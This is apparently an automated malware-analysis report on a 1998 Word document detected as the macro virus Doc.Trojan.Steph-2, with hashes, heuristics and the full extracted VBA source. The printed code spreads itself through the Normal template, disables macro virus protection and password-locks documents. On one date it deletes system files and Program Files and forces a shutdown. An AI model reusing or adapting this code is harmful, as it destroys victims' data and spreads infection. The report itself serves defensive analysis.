Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eaf8e990670a579f…

MALICIOUS

Office (OLE)

38.5 KB Created: 1998-01-18 10:54:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 47e34c422bbccab4b032abdd03a27b8f SHA-1: 63c3097c829de9c83b58eef0ed80e44fec7c46e3 SHA-256: eaf8e990670a579f0fbfad6300c558750e8d4ee4f70c9030913fdebc52611f37
316 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1497.001 System Checks: System Checks

The sample contains legacy WordBasic and VBA macros, including AutoOpen and AutoClose functions, which are indicative of malicious intent. The VBA script attempts to infect other documents and sets a password on the active document using the string 'StephanieILoveYou_4228250625.00000000'. It also modifies application settings and user information, potentially as part of an infection or evasion routine.

Heuristics 7

  • ClamAV: Doc.Trojan.Steph-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Steph-2
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
                 Shell ("Attrib -h -r -s c:\windows\system.dat")
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6527 bytes
SHA-256: 03ab8568c5816ce9d160530bd2010bcd06937c3d4aa8279e559b92839046eed0
Detection
ClamAV: Doc.Trojan.Steph-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SiliconC"
Private Declare Function SwapMouseButton Lib "user32" (ByVal bSwap As Long) As Long
Private Declare Function ExitWindows Lib "user32" (ByVal dwReserved As Long, ByVal uReturnCode As Long) As Long
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Sub AutoOpen()
On Error GoTo CHILD
InfectDOC
InfectGlob
Innocence
CHILD:
End Sub
Sub AutoClose()
On Error GoTo CHILD
InfectDOC
InfectGlob
Innocence
ActiveDocument.Password = "StephanieILoveYou_" & Rnd * 4228250625# & Rnd * FFFFFFFFH
ActiveDocument.Save
SwapMouseButton (2)
CHILD:
End Sub
Sub FileSave()
On Error GoTo CHILD:
InfectDOC
InfectGlob
Innocence
ActiveDocument.Password = "StephanieILoveYou_" & Rnd * 4228250625# & Rnd * FFFFFFFFH
ActiveDocument.Save
CHILD:
End Sub
Sub FileSaveAs()
On Error GoTo CHILD:
InfectDOC
InfectGlob
Innocence
ActiveDocument.Password = "StephanieILoveYou_" & Rnd * 4228250625# & Rnd * FFFFFFFFH
Dialogs(wdDialogFileSaveAs).Show
mgsbox "Server Volume : I_LOVE_STEPHANIE Found.", , "File Succesfully Saved"
CHILD:
End Sub
Sub SendMail()
InfectDOC
InfectGlob
ActiveDocument.SendMail
End Sub
Sub Innocence()
On Error GoTo CHILD
        Application.UserName = "Silicon Child"
        Application.UserInitials = "SC"
        Application.UserAddress = "532 Silicon Valley Kln. Angle Of Sin Loves You Stephanie"
        Options.BackgroundSave = False
        Options.CreateBackup = False
        Options.SendMailAttach = True
        Options.EnableSound = False
        Options.WPHelp = False
        Options.CheckSpellingAsYouType = False
        Options.CheckGrammarWithSpelling = False

'I'm not soo sure about the shell command...on some systems it does not load...
' Does a little more than the Wuzzu Virus..... though

    
    If Month(Now) = 3 Then
    MsgBox "I LOVE YOU STEPHANIEY", , "Message from Global Network TCP/IP Instuction"
    End If
    If Day(Now) = 28 And Month(Now) = 8 Then
             Shell ("Attrib -h -r -s c:\windows\system.dat")
             Shell ("Attrib -h -r -s C:\Windows\system.da0")
             Shell ("Attrib -h -r -s C:\Windows\user.da0")
             Shell ("Attrib -h -r -s C:\Windows\user.dat")
             Shell ("Attrib -h -r -s C:\command.com")
             Shell ("attrib -h -r -s C:\autoexec.bat")
              Kill ("c:\command.com")
              Kill ("C:\autoexec.bat")
              Kill ("C:\windows\system.dat")
              Kill ("C:\windows\system.da0")
              Kill ("C:\windows\user.dat")
              Kill ("C:\windows\user.da0")
         MsgBox " A WAR WIll BEING. BROUGHT ON BY NOT A RULER BUT A CHILD PROTECTED BY THE ANGLE OF SIN. THIS WILL BE A DIGITAL WAR. ENERMIES USING THE LATEST DEVICES OF TECHNOLOGY, IT WILL BE A WAR ABOUT ME AND YOU, GOVERNMENT AND PRISONERS AND COPS AND CRIMINALS, THE WILL BE CALLED THE SILiCoN ChIlD. The New World Will Be Run By The SiLiCon ChiLd and By The InFoMaTiOn LibErAtIoN FrOnT.", , "Silicon Child --By Angle Of Sin - POTion Forever"
             Shell ("Deltree  /y C:\Progra~1")
         ExitWindowsEx &H2, FFFFFFFFH
    End If
CHILD:
    
End Sub
Sub FilePrint()
On Error GoTo CHILD
InfectDOC
InfectGlob
Innocence
MsgBox "Error the printer port could not be found or printer name is invalid, please configure system", , "Printer Error"
MsgBox "Error Cannot Spool Document To Printer", , " Spooling Error"
CHILD:
End Sub
Sub ToolsMacro()
On Error GoTo CHILD
InfectDOC
InfectGlob
MsgBox "An Invalid Command Was executed, the last processed command will be terminated", , "Fatal Systematic Error"
CHILD:
End Sub
Sub FilesTemplates()
InfectDOC
InfectGlob
Innocence
MsgBox "File :!#@|@|^& cannot be opened", , "Fatal System Error"
SwapMouseButton &H4

End Sub
Sub EditFind()
InfectDOC
InfecGlob
SwapMouseButton &H4

End Sub
Sub ToolsWordCount()
On Error GoTo CHILD
InfectDOC
SwapMouseButton &H4
InfectGlob
CHILD:
End Sub
Sub ViewVBCode()
On Error GoTo CHILD
InfectDOC
InfectGlob
MsgBox "File Allocation Error: Unable to access segment at CS:1400", , "Memory Allocation Error"
SwapMouseButton &H4
CHILD:
End Sub
Sub InfectDOC()
On Error GoTo CHILD:
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Angle:

Options.VirusProtection = False
Application.UserName = "Silicon Child"
Application.UserInitials = "SC"
Application.UserAddress = "532 Silicon Valley Kln. Angle Of Sin Loves You Stephanie"
Options.BackgroundSave = False
Options.CreateBackup = False
Options.SendMailAttach = True
DocumentInstalled = False
Options.EnableSound = False
Options.WPHelp = False
Options.CheckSpellingAsYouType = False
Options.CheckGrammarWithSpelling = False
Set ActiveDoc = ActiveDocument
Set GlobalDoc = NormalTemplate
If NormalInstalled = False Then
 Application.OrganizerCopy Source:=NormalTemplate.Name, Destination:=ActiveDocument.Name, Name:="SiliconC", Object:=wdOrganizerObjectProjectItems
 ActiveDocument.SaveAs FileName:=ActiveDocument.Name, FileFormat:=wdFormalTemplate
End If
CHILD:
End Sub
Sub InfectGlob()
On Error GoTo CHILD
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Angle:

Options.VirusProtection = False

Application.UserName = "Silicon Child"
Application.UserInitials = "SC"
Application.UserAddress = "532 Silicon Valley Kln. Angle Of Sin Loves You Stephanie"
Options.BackgroundSave = False
Options.CreateBackup = False
Options.SendMailAttach = True
Options.EnableSound = False

Set ActiveDoc = ActiveDocument
Set GlobalDoc = NormalTemplate
GlobalInstalled = False
   
For a = 1 To NormalTemplate.VBProject.VBComponents.Count
 If NormalTemplate.VBProject.VBComponents(a).Name = "AngleOfSin" Then
  GloabalInstalled = True
 End If
Next

If GlobalInstalled = False Then
 Application.OrganizerCopy Source:=ActiveDocument.Name, Destination:=NormalTemplate.Name, Name:="SiliconC", Object:=wdOrganizerObjectProjectItems
 Options.SaveNormalPrompt = False
End If
CHILD:
End Sub
' This is a dedication to Stephanie Collinz...the most beautiful girl in the world..
' May be I'm tripping right now but yea!.
' Thanks to ILF for distributing Info....LONG LIVE ILF

Open this report in the interactive analyzer, or submit your own file for analysis.